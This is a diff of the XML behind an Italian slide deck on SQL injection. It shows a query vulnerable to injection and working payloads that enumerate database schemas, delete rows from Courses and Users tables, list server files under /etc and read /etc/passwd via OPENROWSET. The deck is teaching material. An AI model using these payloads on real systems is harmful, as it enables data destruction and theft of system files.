+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide42.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 166"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -12267,20 +13419,27 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0"/>
             <a:r>
               <a:rPr lang="en" dirty="0"/>
               <a:t>SQL Injection crash(ed) course – Try this ONLY at home!</a:t>
             </a:r>
-            <a:endParaRPr dirty="0"/>
+            <a:br>
+              <a:rPr lang="en" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" sz="1600" dirty="0"/>
+              <a:t>C</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
+              <a:t>ome</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
+              <a:t> alcune scelte di comodo in fase di sviluppo possono portare ad effetti... più che indesiderati</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -16487,7 +17646,7 @@
         <p:cNvPr id="1" name="Shape 127">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636EE322-A662-0371-75C9-16633F3BB9F2}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8514F820-9423-EBF7-BD2C-B1330B324580}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -16507,7 +17666,7 @@
           <p:cNvPr id="128" name="Google Shape;128;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{195004AB-5ED0-C943-CF67-C80F05E44004}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BADEC0B-32D2-6FE8-ACE2-0A9D36C46C07}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -16575,7 +17734,7 @@
           <p:cNvPr id="129" name="Google Shape;129;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31151D6E-FC87-00EA-80CB-57DEC847F6ED}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6054B53A-18F4-4714-8669-FF27EEA95FBB}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -16609,7 +17768,7 @@
           <p:cNvPr id="130" name="Google Shape;130;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA65E0F-0774-800E-AE39-63360B053884}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D62CB1C-1635-22DB-DE55-E5EFDA115907}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -16802,7 +17961,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1631117498"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278033151"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -17100,7 +18259,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>' UNION ALL SELECT NULL, CONCAT(S.name, '.', T.name, '.', C.name), NULL, NULL, NULL, NULL FROM AdventureWorks2022.sys.columns C INNER JOIN AdventureWorks2022.sys.tables T ON </a:t>
+              <a:t>' UNION ALL SELECT NULL, CONCAT(S.name, '.', T.name, '.', C.name), NULL, NULL, NULL, NULL FROM AdventureWorksDW2022.sys.columns C INNER JOIN AdventureWorksDW2022.sys.tables T ON </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
@@ -17136,7 +18295,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t> INNER JOIN AdventureWorks2022.sys.schemas S ON </a:t>
+              <a:t> INNER JOIN AdventureWorksDW2022.sys.schemas S ON </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
@@ -18862,7 +20021,7 @@
         <p:cNvPr id="1" name="Shape 127">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC4F3D9-4C60-3D2D-5635-53F8E82B872A}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA86480F-F968-3F96-96E7-A605D3160EED}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -18882,7 +20041,7 @@
           <p:cNvPr id="128" name="Google Shape;128;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049DB303-33EA-2975-5CBD-8F7C630A93B0}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52626A5-45A6-18D0-7613-BFA863290EEE}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -18911,15 +20070,7 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Coprire</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> le </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>proprie</a:t>
+              <a:t>Elencare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -18927,7 +20078,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>tracce</a:t>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> file </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sul</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server*</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -18938,7 +20101,7 @@
           <p:cNvPr id="129" name="Google Shape;129;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28B8EFA-2249-C665-5F5C-FDC45E80FD29}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FCEF64-BAEF-0734-31E9-C46228160C64}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -18972,7 +20135,7 @@
           <p:cNvPr id="130" name="Google Shape;130;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4D5A63-6896-0F75-994E-CAA72275A31A}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A27826-F33A-EF78-7EE7-57721E61D1C3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -19130,7 +20293,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>'; DELETE FROM </a:t>
+              <a:t>' UNION ALL SELECT NULL, </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
@@ -19139,7 +20302,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>dbo.Courses</a:t>
+              <a:t>full_filesystem_path</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -19148,7 +20311,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t> WHERE </a:t>
+              <a:t>, NULL, NULL, NULL, NULL FROM </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
@@ -19157,7 +20320,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>UserId</a:t>
+              <a:t>sys.dm_os_enumerate_filesystem</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -19166,7 +20329,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t> IN (SELECT Id FROM </a:t>
+              <a:t>('/</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
@@ -19175,7 +20338,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>dbo.Users</a:t>
+              <a:t>etc</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -19184,25 +20347,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t> WHERE Email = 'pippo@disney.com'); DELETE FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>dbo.Users</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> WHERE Email = 'pippo@disney.com';--</a:t>
+              <a:t>','*.*') ORDER BY 2--</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -19219,7 +20364,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="751677404"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131889864"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -19437,6 +20582,2617 @@
         <p:cNvPr id="1" name="Shape 127">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D106401-D067-904C-EC86-547F019C27A3}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3FC83D-2442-488D-95BD-03E97D9D3323}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> il </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>contenuto</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> di un file </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sul</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server*</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E03A5E6E-8915-0046-FC00-D0803052D4DB}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B09683C9-7D13-5F24-E3B0-6998B9DC5A3C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>BulkColumn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, NULL, NULL, NULL, NULL FROM OPENROWSET(BULK N'/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>etc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>/passwd', SINGLE_CLOB) AS Contents ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3305111151"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5F97DA1-B9FD-8812-BC2D-3629633D3F20}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
